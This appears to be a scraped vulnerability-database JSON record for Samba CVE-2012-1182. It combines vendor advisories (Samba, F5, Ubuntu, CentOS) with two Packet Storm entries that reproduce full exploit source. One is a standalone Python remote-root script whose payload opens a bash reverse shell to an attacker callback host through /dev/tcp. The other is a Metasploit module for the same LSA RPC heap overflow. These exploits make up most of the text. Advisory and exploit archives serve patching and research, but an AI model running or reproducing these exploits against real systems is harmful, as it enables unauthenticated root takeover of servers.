The Samba Team would like to thank them for\nreporting the problem and their cooperation in this matter.\n\nPatches were provided by Stefan Metzmacher of the Samba team, based on\ninitial work by Volker Lendecke.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "samba", "title": "\"root\" credential remote code execution.", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T00:00:00", "id": "SAMBA:CVE-2012-1182", "href": "https://www.samba.org/samba/security/CVE-2012-1182.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:13", "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability. 
To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP AAM| None| 11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 6.x \n5.x| None \nNone \nNone\n\nNone \n\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "cvss3": {}, "published": "2012-07-10T20:45:00", "type": "f5", "title": "Samba vulnerability CVE-2012-1182", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2016-07-01T23:45:00", "id": "F5:K13719", "href": "https://support.f5.com/csp/article/K13719", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "cvss3": {}, "published": "2012-07-10T00:00:00", "type": "f5", "title": "SOL13719 - Samba vulnerability CVE-2012-1182", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2016-07-01T00:00:00", "id": "SOL13719", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/700/sol13719.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:26", 
"description": "", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "packetstorm", "title": "Samba 3.x Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-09-25T00:00:00", "id": "PACKETSTORM:116843", "href": "https://packetstormsecurity.com/files/116843/Samba-3.x-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# \n# finding targets 4 31337z: \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell \n# found by eax samba 0day godz (loljk) \n \n \nfrom binascii import hexlify, unhexlify \nimport socket \nimport threading \nimport SocketServer \nimport sys \nimport os \nimport time \nimport struct \n \ntargets = [ \n{ \n\"name\" : \"samba_3.6.3-debian6\", \n\"chunk_offset\" : 0x9148, \n\"system_libc_offset\" : 0xb6d003c0 \n}, \n{ \n\"name\" : \"samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)\", \n\"chunk_offset\" : 4560, \n\"system_libc_offset\" : 0xb20 \n}, \n{ \n\"name\" : \"target_finder (hardcode correct system addr)\", \n\"chunk_offset\" : 0, \n\"system_libc_offset\" : 0xb6d1a3c0, \n\"finder\": True \n} \n] \n \ndo_brute = True \nrs = 1024 \nFILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' 
for x in range(256)]) \n \ndef dump(src, length=32): \nresult=[] \nfor i in xrange(0, len(src), length): \ns = src[i:i+length] \nhexa = ' '.join([\"%02x\"%ord(x) for x in s]) \nprintable = s.translate(FILTER) \nresult.append(\"%04x %-*s %s\\n\" % (i, length*3, hexa, printable)) \nreturn ''.join(result) \n \n \nsploitshake = [ \n# HELLO \n\"8100004420434b4644454e4543464445\" + \\ \n\"46464346474546464343414341434143\" + \\ \n\"41434143410020454745424644464545\" + \\ \n\"43455046494341434143414341434143\" + \\ \n\"4143414341414100\", \n \n# NTLM_NEGOT \n\"0000002fff534d427200000000000000\" + \\ \n\"00000000000000000000000000001d14\" + \\ \n\"00000000000c00024e54204c4d20302e\" + \\ \n\"313200\", \n \n# SESSION_SETUP \n\"0000004bff534d427300000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"000000000dff000000ffff02001d1499\" + \\ \n\"1f00000000000000000000010000000e\" + \\ \n\"000000706f736978007079736d6200\", \n \n# TREE_CONNECT \n\"00000044ff534d427500000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"6400000004ff00000000000100190000\" + \\ \n\"5c5c2a534d425345525645525c495043\" + \\ \n\"24003f3f3f3f3f00\", \n \n# NT_CREATE \n\"00000059ff534d42a200000000180100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000018ff00000000050016000000\" + \\ \n\"000000009f0102000000000000000000\" + \\ \n\"00000000030000000100000040000000\" + \\ \n\"020000000306005c73616d7200\" \n] \n \npwnsauce = { \n'smb_bind': \\ \n\"00000092ff534d422500000000000100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000010000048000004e0ff000000\" + \\ \n\"0000000000000000004a0048004a0002\" + \\ \n\"002600babe4f005c504950455c000500\" + \\ \n\"0b03100000004800000001000000b810\" + \\ \n\"b8100000000001000000000001007857\" + \\ \n\"34123412cdabef000123456789ab0000\" + \\ \n\"0000045d888aeb1cc9119fe808002b10\" + \\ \n\"486002000000\", \n \n'data_chunk': \\ \n\"000010efff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ 
\n\"640000000eff000000babe00000000ff\" + \\ \n\"0000000800b0100000b0103f00000000\" + \\ \n\"00b0100500000110000000b010000001\" + \\ \n\"0000009810000000000800\", \n \n'final_chunk': \\ \n\"000009a3ff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"00000008006409000064093f00000000\" + \\ \n\"00640905000002100000006409000001\" + \\ \n\"0000004c09000000000800\" \n} \n \n \ndef exploit(host, port, cbhost, cbport, target): \nglobal sploitshake, pwnsauce \n \nchunk_size = 4248 \n \ntarget_tcp = (host, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target_tcp) \n \nn = 0 \nfor pkt in sploitshake: \ns.send(unhexlify(pkt)) \npkt_res = s.recv(rs) \nn = n+1 \n \nfid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) \n \ns.send(unhexlify(pwnsauce['smb_bind'].replace(\"babe\", fid))) \npkt_res = s.recv(rs) \n \nbuf = \"X\"*20 # policy handle \nlevel = 2 #LSA_POLICY_INFO_AUDIT_EVENTS \nbuf+=struct.pack('<H',level) # level \nbuf+=struct.pack('<H',level)# level2 \nbuf+=struct.pack('<L',1)#auditing_mode \nbuf+=struct.pack('<L',1)#ptr \nbuf+=struct.pack('<L',100000) # r->count \nbuf+=struct.pack('<L',20) # array_size \nbuf+=struct.pack('<L',0) \nbuf+=struct.pack('<L',100) \n \nbuf += (\"A\" * target['chunk_offset']) \n \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0xe8150c70); \nbuf+=\"AAAABBBB\" \n \ncmd = \";;;;/bin/bash -c '/bin/bash 0</dev/tcp/\"+cbhost+\"/\"+cbport+\" 1>&0 2>&0' &\\x00\" \n \ntmp = cmd*(816/len(cmd)) \ntmp += \"\\x00\"*(816-len(tmp)) \n \nbuf+=tmp \nbuf+=\"A\"*(37192-target['chunk_offset']) \nbuf+='z'*(100000 - (28000 + 10000)) \n \nbuf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] \nn=0 \n \nfor chunk in buf_chunks: \nif len(chunk) != chunk_size: \n#print \"LAST CHUNK #%d\" % n \nbb = 
unhexlify(pwnsauce['final_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nelse: \n#print \"CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['data_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nretbuf = s.recv(rs) \nn=n+1 \n \ns.close() \n \nclass connectback_shell(SocketServer.BaseRequestHandler): \ndef handle(self): \nglobal do_brute \n \nprint \"\\n[!] connectback shell from %s\" % self.client_address[0] \ndo_brute = False \n \ns = self.request \n \nimport termios, tty, select, os \nold_settings = termios.tcgetattr(0) \ntry: \ntty.setcbreak(0) \nc = True \nwhile c: \nfor i in select.select([0, s.fileno()], [], [], 0)[0]: \nc = os.read(i, 1024) \nif c: \nif i == 0: \nos.write(1, c) \n \nos.write(s.fileno() if i == 0 else 1, c) \nexcept KeyboardInterrupt: pass \nfinally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) \n \nreturn \n \n \nclass ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): \npass \n \n \nif len(sys.argv) != 6: \nprint \"\\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\\n\" \nprint \" usage: %s <targethost> <targetport> <myip> <myport> <target>\\n\" % (sys.argv[0]) \nprint \" targets:\" \ni = 0 \nfor target in targets: \nprint \" %02d) %s\" % (i, target['name']) \ni = i+1 \n \nprint \"\" \nsys.exit(-1) \n \n \ntarget = targets[int(sys.argv[5])] \n \nserver = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) \nserver_thread = threading.Thread(target=server.serve_forever) \nserver_thread.daemon = True \nserver_thread.start() \n \nwhile do_brute == True: \nsys.stdout.write(\"\\r{+} TRYING EIP=\\x1b[31m0x%08x\\x1b[0m OFFSET=\\x1b[32m0x%08x\\x1b[0m\" % (target['system_libc_offset'], target['chunk_offset'])) \nsys.stdout.flush() \nexploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) \n \nif \"finder\" in target: \ntarget['chunk_offset'] += 4 \nelse: \ntarget['system_libc_offset'] += 0x1000 \n \n \nif \"finder\" in target: \nprint \\ \n\"{!} found 
\\x1b[32mNEW\\x1b[0m target: chunk_offset = ~%d, \" \\ \n\"system_libc_offset = 0x%03x\" % \\ \n(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) \n \nwhile 1: \ntime.sleep(999) \n \nserver.shutdown() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116843/samba3-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:25:21", "description": "", "cvss3": {}, "published": "2012-09-28T00:00:00", "type": "packetstorm", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-09-28T00:00:00", "id": "PACKETSTORM:116953", "href": "https://packetstormsecurity.com/files/116953/Samba-SetInformationPolicy-AuditEventsInfo-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow', \n'Description' => %q{ \nThis module triggers a vulnerability in the LSA RPC service of the Samba daemon \nbecause of an error on the PIDL auto-generated code. Making a specially crafted \ncall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to \ntrigger a heap overflow and finally execute arbitrary code with root privileges. \n \nThe module uses brute force to guess the system() address and redirect flow there \nin order to bypass NX. 
The start and stop addresses for brute forcing have been \ncalculated empirically. On the other hand the module provides the StartBrute and \nStopBrute which allow the user to configure his own addresses. \n}, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'blasty', # Exploit \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2012-1182'], \n['OSVDB', '81303'], \n['BID', '52973'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/'] \n], \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 811, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic bash telnet python perl', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start for the final version should be 0xb20 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230b20 }, \n'Stop' => { 'Ret' => 0x22a00b20 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x950 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230950 }, \n'Stop' => { 'Ret' => 0x22a00950 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x680 aligned, and then step 0x1000. 
\n'Start' => { 'Ret' => 0x00230680 }, \n'Stop' => { 'Ret' => 0x22a00680 }, \n'Step' => 0x1000, \n} \n} \n] \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]), \nOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ]) \n], self.class) \n \nend \n \ndef exploit \nif target.bruteforce? \nbf = target.bruteforce \n \nif datastore['StartBrute'] and datastore['StartBrute'] > 0 \nbf.start_addresses['Ret'] = datastore['StartBrute'] \nend \n \nif datastore['StopBrute'] and datastore['StopBrute'] > 0 \nbf.stop_addresses['Ret'] = datastore['StopBrute'] \nend \n \nif bf.start_addresses['Ret'] > bf.stop_addresses['Ret'] \nraise ArgumentError, \"StartBrute should not be larger than StopBrute\" \nend \nend \nsuper \nend \n \ndef check \nbegin \nconnect() \nsmb_login() \ndisconnect() \n \nversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0] \nminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i \nprint_status(\"Version found: #{version}\") \n \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4 \n \nreturn Exploit::CheckCode::Safe \n \nrescue ::Exception \nreturn CheckCode::Unknown \nend \nend \n \ndef brute_exploit(target_addrs) \n \nprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret']) \ndatastore['DCERPC::fake_bind_multi'] = false \ndatastore['DCERPC::max_frag_size'] = 4248 \n \npipe = \"lsarpc\" \n \nprint_status(\"Connecting to the SMB service...\") \nconnect() \nprint_status(\"Login to the SMB service...\") \nsmb_login() \n \nhandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"]) \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} 
...\") \n \nstub = \"X\" * 20 \n \ncmd = \";;;;\" # padding \ncmd << \"#{payload.encoded}\\x00\" # system argument \ntmp = cmd * (816/cmd.length) \ntmp << \"\\x00\"*(816-tmp.length) \n \nstub << NDR.short(2) # level \nstub << NDR.short(2) # level 2 \nstub << NDR.long(1) # auditing mode \nstub << NDR.long(1) # ptr \nstub << NDR.long(100000) # r-> count \nstub << NDR.long(20) # array size \nstub << NDR.long(0) \nstub << NDR.long(100) \nstub << rand_text_alpha(target['Offset']) \n# Crafted talloc chunk \nstub << 'A' * 8 # next, prev \nstub << NDR.long(0) + NDR.long(0) # parent, child \nstub << NDR.long(0) # refs \nstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP \nstub << NDR.long(0) # name \nstub << \"AAAA\" # size \nstub << NDR.long(0xe8150c70) # flags \nstub << \"AAAABBBB\" \nstub << tmp # pointer to tmp+4 in $esp \nstub << rand_text(32632) \nstub << rand_text(62000) \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ncall(dcerpc, 0x08, stub) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError \nprint_status('Server did not respond, this is expected') \nrescue Rex::Proto::DCERPC::Exceptions::Fault \nprint_error('Server is most likely patched...') \nrescue => e \nif e.to_s =~ /STATUS_PIPE_DISCONNECTED/ \nprint_status('Server disconnected, this is expected') \nend \nend \n \nhandler \ndisconnect \nend \n \n# Perform a DCE/RPC Function Call \ndef call(dcerpc, function, data, do_recv = true) \n \nfrag_size = data.length \nif dcerpc.options['frag_size'] \nfrag_size = dcerpc.options['frag_size'] \nend \nobject_id = '' \nif dcerpc.options['object_call'] \nobject_id = dcerpc.handle.uuid[0] \nend \nif options['random_object_id'] \nobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) \nend \n \ncall_packets = make_request(function, data, frag_size, dcerpc.context, object_id) \ncall_packets.each { |packet| \nwrite(dcerpc, packet) \n} \n \nreturn true if not do_recv \n 
\nraw_response = '' \n \nbegin \nraw_response = dcerpc.read() \nrescue ::EOFError \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \nif (raw_response == nil or raw_response.length == 0) \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \n \ndcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response) \n \nif dcerpc.last_response.type == 3 \ne = Rex::Proto::DCERPC::Exceptions::Fault.new \ne.fault = dcerpc.last_response.status \nraise e \nend \n \ndcerpc.last_response.stub_data \nend \n \n# Used to create standard DCERPC REQUEST packet(s) \ndef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '') \n \nopnum = opnum.to_i \nsize = size.to_i \nctx = ctx.to_i \n \nchunks, frags = [], [] \nptr = 0 \n \n# Break the request into fragments of 'size' bytes \nwhile ptr < data.length \nchunks.push( data[ ptr, size ] ) \nptr += size \nend \n \n# Process requests with no stub data \nif chunks.length == 0 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) ) \nreturn frags \nend \n \n# Process requests with only one fragment \nif chunks.length == 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) ) \nreturn frags \nend \n \n# Create the first fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) ) \n \n# Create all of the middle fragments \nwhile chunks.length != 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) ) \nend \n \n# Create the last fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) ) \n \nreturn frags \nend \n \n# Write data to the underlying socket \ndef write(dcerpc, data) \ndcerpc.socket.write(data) \ndata.length \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116953/setinfopolicy_heap.rb.txt", "cvss": 
{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T13:06:17", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when \nhandling remote procedure calls (RPC) over the network. A remote, \nunauthenticated attacker could exploit this to execute arbitrary code as the \nroot user. (CVE-2012-1182)\n", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "ubuntu", "title": "Samba vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-13T00:00:00", "id": "USN-1423-1", "href": "https://ubuntu.com/security/notices/USN-1423-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2022-02-27T11:54:44", "description": "**CentOS Errata and Security Advisory** CESA-2013:0515\n\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. 
(CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056239.html\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056372.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013398.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013534.html\n\n**Affected packages:**\nevolution-mapi\nevolution-mapi-devel\nopenchange\nopenchange-client\nopenchange-devel\nopenchange-devel-docs\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2013:0515", "cvss3": {}, "published": "2013-02-27T19:34:43", "type": "centos", "title": "evolution, openchange security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-03-09T00:42:10", "id": "CESA-2013:0515", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2013-February/013398.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:55:42", "description": "**CentOS Errata and Security Advisory** CESA-2012:0466\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055480.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0466", "cvss3": {}, "published": "2012-04-10T21:13:02", "type": "centos", "title": "samba3x security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:13:02", "id": "CESA-2012:0466", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/055480.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:54:49", "description": "**CentOS Errata and Security Advisory** CESA-2013:0506\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. 
